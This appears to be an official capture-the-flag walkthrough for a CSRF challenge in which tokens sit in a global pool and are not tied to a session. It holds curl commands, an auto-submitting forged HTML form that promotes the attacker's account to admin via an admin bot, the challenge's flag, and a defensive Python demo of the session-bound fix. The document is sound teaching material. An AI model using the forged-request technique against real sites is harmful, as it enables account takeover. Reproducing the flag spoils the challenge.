HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

DevHub

CSRF · CSRF Token Not Session-Bound (Global Token Pool)
Difficulty
Medium
Vuln class
CSRF Token Not Session-Bound (Global Token Pool)
Steps
5
// Objective
Use your own valid CSRF token in a forged request that the admin bot submits — promoting your account to admin and revealing the flag.
// Tools required
curl, python3
// Step-by-step walkthrough
1
Get your CSRF token
You are auto-logged in as "hacker". Fetch your CSRF token from the API.
Command / Input
curl -s -b 'session=hackersesstoken77' http://localhost:$PORT/api/csrf-token
Output
{"csrf_token":"<YOUR_TOKEN>"}
Copy this token — you will embed it in the attack page.
2
Create the exploit page
Write a static HTML file containing a form that submits to /api/promote with your CSRF token and your username.
Command / Input
cat > /tmp/exploit.html << EOF
<form id="f" action="http://localhost:$PORT/api/promote" method="POST">
  <input name="username" value="hacker">
  <input name="csrf_token" value="YOUR_TOKEN_HERE">
</form>
<script>document.getElementById("f").submit()</script>
EOF
Replace YOUR_TOKEN_HERE with the token from step 1. The heredoc delimiter is left unquoted so that $PORT expands to the challenge port, as it does in the other commands.
3
Serve the exploit page
Start a simple HTTP server to host exploit.html so the admin bot can fetch it.
Command / Input
python3 -m http.server 8888 --directory /tmp
Leave this running.
4
Queue the admin bot
Tell the admin bot to visit your exploit page. The bot will fetch it, parse the form, and submit it using the admin session cookie — but with YOUR CSRF token.
Command / Input
curl -s -X POST http://localhost:$PORT/api/queue-visit -d 'url=http://localhost:8888/exploit.html'
Output
{"ok":true,"message":"Admin bot will visit shortly (every 5 s)"}
The server accepts the request because it only checks that the token exists in the global pool — it never verifies the token belongs to the admin session.
5
Confirm promotion and get the flag
After the bot visits, check your role. You should now have the admin role, and the flag is returned in the same response.
Command / Input
curl -s -b 'session=hackersesstoken77' http://localhost:$PORT/api/me
Output
{"username":"hacker","role":"admin","flag":"HackrGG{csrf_t0k3n_n0t_b0und_s3ss10n_bypas5}"}
// Flag
Flag value
HackrGG{csrf_t0k3n_n0t_b0und_s3ss10n_bypas5}
Returned in the /api/me response once your account is promoted to admin.
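The root cause in step 4 is the server's validation logic, not the token itself: a global pool answers "was this token ever issued?", when the question a CSRF check must answer is "was this token issued to the session that is now presenting it?". The following added example (not the DevHub challenge's server code; the session ids, usernames and in-memory stores are constructed for the demo) replays the walkthrough against both designs and shows the hardened check rejecting the forged promotion while still accepting the admin's own token.

```python
"""Global CSRF token pool versus session-bound tokens.

Added example, not the challenge's own server code. Session ids, usernames
and the two in-memory stores are constructed for the demonstration.
"""
import hmac
import secrets

# Vulnerable design: one pool of every token ever issued, no owner recorded.
GLOBAL_POOL = set()
# Hardened design: each session owns exactly one token.
SESSION_TOKENS = {}


def issue_token_global(session_id):
    """Issue a token into the shared pool; the session id is ignored,
    which is exactly the flaw the challenge exhibits."""
    token = secrets.token_hex(16)
    GLOBAL_POOL.add(token)
    return token


def issue_token_bound(session_id):
    """Issue a token and record which session it belongs to."""
    token = secrets.token_hex(16)
    SESSION_TOKENS[session_id] = token
    return token


def verify_global(token):
    """Flawed check: 'does this token exist anywhere?'"""
    return token in GLOBAL_POOL


def verify_bound(session_id, token):
    """Correct check: 'is this the token issued to the session sending it?'"""
    expected = SESSION_TOKENS.get(session_id)
    if expected is None or token is None:
        return False
    # Constant-time comparison so the check cannot be timed byte by byte.
    return hmac.compare_digest(expected, token)


def handle_promote(session_id, form, session_bound):
    """Simulated POST /api/promote: the cookie names the acting session and the
    form body carries the token. Returns True if the promotion is accepted."""
    token = form.get("csrf_token")
    if session_bound:
        return verify_bound(session_id, token)
    return verify_global(token)


def run_scenario(session_bound):
    """Replay the walkthrough: the attacker fetches a token for their own session,
    then the admin bot submits the attacker's form with the admin cookie.

    Returns (forged_request_accepted, admins_own_token_accepted).
    """
    GLOBAL_POOL.clear()
    SESSION_TOKENS.clear()
    issue = issue_token_bound if session_bound else issue_token_global
    attacker_token = issue("hacker-session")   # constructed: step 1 of the walkthrough
    admin_token = issue("admin-session")       # constructed: what admin's own pages carry
    forged = {"username": "hacker", "csrf_token": attacker_token}
    legit = {"username": "hacker", "csrf_token": admin_token}
    forged_accepted = handle_promote("admin-session", forged, session_bound)
    legit_accepted = handle_promote("admin-session", legit, session_bound)
    return forged_accepted, legit_accepted


if __name__ == "__main__":
    print("global pool   (forged, legit):", run_scenario(session_bound=False))
    print("session-bound (forged, legit):", run_scenario(session_bound=True))
```

Running it prints `(True, True)` for the global pool, meaning the forged request goes through just as the walkthrough shows, and `(False, True)` for the session-bound design: the attacker's token is a real token, but it is not the admin session's token, so the promotion is refused while the admin's legitimate submissions keep working. Storing the token against the session (or deriving it from the session id with an HMAC) is the fix; checking membership in a shared pool is never sufficient.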